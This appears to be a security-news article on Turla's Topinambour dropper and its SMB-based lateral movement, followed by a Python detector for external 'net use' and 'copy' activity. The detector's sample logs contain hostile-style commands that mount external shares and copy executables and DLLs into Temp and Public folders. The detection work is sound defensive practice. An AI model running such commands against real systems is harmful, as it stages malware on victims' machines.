Turla APT, also known as Waterbug, Venomous Bear and many other names, was found using a new dropper in a recent campaign this year. The discovery was made by security researchers at Kaspersky.
Russian-speaking Turla (a.k.a. Snake, Venomous Bear, Waterbug and Uroboros) is known for espionage campaigns targeting Western governments as well as embassies and consulates in post-Soviet states. It has been active since at least 2014 (and possibly earlier), developing a range of custom backdoors to carry out its work, and it continually evolves both its malware and its targets.
The Turla APT has revamped its arsenal in 2019, creating new weapons and tools for targeting government entities. It is now using booby-trapped anti-internet-censorship software as an initial infection vector, suggesting Turla is going after dissident or other civil-society targets.
The Topinambour dropper contains what Kaspersky calls a “tiny .NET shell” that waits for Windows shell commands from the command-and-control (C2) server and silently executes them. The C2 infrastructure is hosted on compromised WordPress sites and cloud services.
“Using this and SMB shares on rented virtual private servers (VPS) [in South Africa], the campaign operators spread the next-stage modules using just ‘net use’ and ‘copy’ Windows shell commands,” the researchers noted.
The trojans upload, download and execute files, and fingerprint target systems. The PowerShell version of the trojan also can capture screenshots. They communicate with the C2 from an opened SMB share on a remote CELL-C VPS in South Africa.
They also retrieve a final-stage, more complex trojan, able to parse and execute custom commands from the C2, the researchers added. During the final stage of infection, this encrypted remote-administration trojan is stored in the computer’s registry, where the malware accesses it once installation is complete.
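The lateral-movement step described above (next-stage modules pulled from SMB shares on rented VPS hosts using only `net use` and `copy`) leaves a simple signal in endpoint process-creation telemetry: a `net use` or `copy` whose UNC path points at a non-internal IP address. The following Python detector is an added example for defenders, not code from the article or from Kaspersky's research. It assumes a constructed pipe-delimited log format (`timestamp|endpoint|command line`), a hypothetical set of "internal" address ranges (RFC 1918, loopback, link-local), and a 10-minute window for correlating a mount with a subsequent copy; hostnames rather than IPs are treated as internal for simplicity. The sample events are constructed and use documentation addresses, not real indicators.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry).
# One event per line: "<ISO timestamp>|<endpoint>|<command line>".
SAMPLE_EVENTS = r"""
2019-07-01T10:00:01|WS-01|net use \\203.0.113.10\share /user:guest Passw0rd
2019-07-01T10:00:05|WS-01|copy \\203.0.113.10\share\module.exe C:\Users\Public\module.exe
2019-07-01T10:03:00|WS-02|net use \\10.0.0.5\fileshare
2019-07-01T10:03:20|WS-02|copy \\10.0.0.5\fileshare\report.docx C:\Users\bob\Desktop\
2019-07-01T11:00:00|WS-03|copy \\198.51.100.7\drop\stage2.dll C:\Windows\Temp\
"""

# Assumed "internal" ranges; a real deployment would use its own inventory.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# \\host\share at the start of a UNC path: host and share contain no backslash or whitespace.
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\([^\\\s]+)")
NET_USE_RE = re.compile(r"^\s*net(?:\.exe)?\s+use\b", re.IGNORECASE)
COPY_RE = re.compile(r"^\s*(?:copy|xcopy|robocopy)\b", re.IGNORECASE)
CORRELATION_WINDOW = timedelta(minutes=10)  # assumed window between mount and copy


def is_internal_host(host):
    """True for an IP inside INTERNAL_NETS. Hostnames are treated as internal
    here (assumption); production logic would resolve them first."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return any(ip in net for net in INTERNAL_NETS)


def parse_events(text):
    """Parse the constructed log format into dicts sorted by timestamp."""
    events = []
    for line in text.strip().splitlines():
        ts, endpoint, cmdline = line.split("|", 2)
        events.append({"ts": datetime.fromisoformat(ts),
                       "endpoint": endpoint, "cmdline": cmdline})
    return sorted(events, key=lambda e: e["ts"])


def analyze_events(text):
    """Flag 'net use' mounts of external SMB shares and copies from external
    shares; a copy preceded by a mount of the same host on the same endpoint
    within CORRELATION_WINDOW is rated high."""
    findings = []
    recent_mounts = {}  # (endpoint, host) -> time of last external 'net use'
    for ev in parse_events(text):
        m = UNC_RE.search(ev["cmdline"])
        if not m or is_internal_host(m.group(1)):
            continue  # no UNC path, or the share lives on an internal host
        host, share = m.group(1), m.group(2)
        base = {"endpoint": ev["endpoint"], "host": host, "share": share,
                "ts": ev["ts"].isoformat(), "cmdline": ev["cmdline"]}
        if NET_USE_RE.match(ev["cmdline"]):
            recent_mounts[(ev["endpoint"], host)] = ev["ts"]
            findings.append({**base, "rule": "external_smb_mount", "severity": "medium"})
        elif COPY_RE.match(ev["cmdline"]):
            mounted = recent_mounts.get((ev["endpoint"], host))
            correlated = mounted is not None and ev["ts"] - mounted <= CORRELATION_WINDOW
            findings.append({**base, "rule": "copy_from_external_smb",
                             "severity": "high" if correlated else "medium"})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:24} {f['endpoint']} -> \\\\{f['host']}\\{f['share']}")
```

Running the block prints three findings: the WS-01 mount, the WS-01 copy (rated high because it follows the mount of the same host within the window), and the WS-03 copy (medium, no prior mount seen). The WS-02 events use an internal file server and are ignored, which is the point of keying the rule on the destination address rather than on `net use` itself.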